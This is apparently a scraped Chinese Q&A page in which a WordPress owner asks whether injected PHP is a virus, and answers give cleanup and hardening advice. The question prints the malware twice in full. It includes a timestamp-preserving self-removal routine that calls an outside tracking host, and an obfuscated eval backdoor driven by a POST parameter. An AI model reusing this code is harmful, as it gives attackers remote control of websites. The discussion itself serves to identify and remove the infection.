Fatal编程技术网
  • php/
  • Php 这是wordpress病毒吗?

Php 这是wordpress病毒吗?

php wordpress frameworks

Php 这是wordpress病毒吗?,php,wordpress,frameworks,eval,Php,Wordpress,Frameworks,Eval,我刚刚注意到我的一些wordpress项目在特定位置包含一些随机代码 例如: wp includes/meta.php包含在下面文件代码的底部: check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732115){ $jp_c = file_get_contents($jp); if($t =

我刚刚注意到我的一些wordpress项目在特定位置包含一些随机代码

例如: wp includes/meta.php包含在下面文件代码的底部:

check_meta();
function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456732115){
        $jp_c = file_get_contents($jp);
        if($t = @strpos($jp_c,"check_meta();")) {
            $contentp = substr($jp_c,0,$t);
            if(@file_put_contents($jp, $contentp)){
                @touch($jp,$jptime);
            }
        }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
另一个位置:wp包含/ID3/getid.php包含以下代码:

check_meta();
function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456732115){
        $jp_c = file_get_contents($jp);
        if($t = @strpos($jp_c,"check_meta();")) {
            $contentp = substr($jp_c,0,$t);
            if(@file_put_contents($jp, $contentp)){
                @touch($jp,$jptime);
            }
        }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
基本上,我看到的是,check_meta()方法正在更新wp includes/meta.php文件,而不更改其修改时间。然后,文件\u get\u contents与某个中文服务器连接,并通过$\u get传递一些数据

在第二个文件中,str_rot13('riny')等于eval

以前有人处理过这种问题吗?也许有人可以说更多关于这个代码。期待您的来信。现在我把它当作病毒一样对待,因为它已经传播到我的许多项目中。

千万不要相信你没有包含的不熟悉的代码!骗子经常试图让恶意软件看起来无害,如上所述。尝试安装WordFence、Sucuri或其他安全插件并运行扫描。

看起来您的服务器已被黑客攻击。我过去曾一两次处理过类似问题。是的,黑客似乎是专门针对WordPress网站的

无论如何都不应该修改WordPress核心

  • 更改所有服务器密码(客户中心、FTP、SSH、SQL等)

  • 下载新安装的WordPress core并移除旧的

  • 检查您的wp内容文件夹是否存在安全问题,尤其是您的主题和插件(检查是否有任何修改或不安全的代码)

  • 在wp-config.php中更改您的安全设置

  • 重新设置WordPress站点后,请提高其安全性。有很多关于如何保护WordPress的文章,也有一些WordPress安全插件可用。扫描你的网站

  • 如果再次出现类似问题,还应检查Web服务器/Web主机的安全设置

    • 我访问了
    http://web.51.la:82
    并打印出我的所有信息:ip地址、浏览器等。它可能是一个跟踪访问和其他东西的跟踪类型插件,我不知道为什么有人会想收集关于你的访问者的信息。我认为如果你在WordPress开发堆栈交换中发布,你可能会得到更好的响应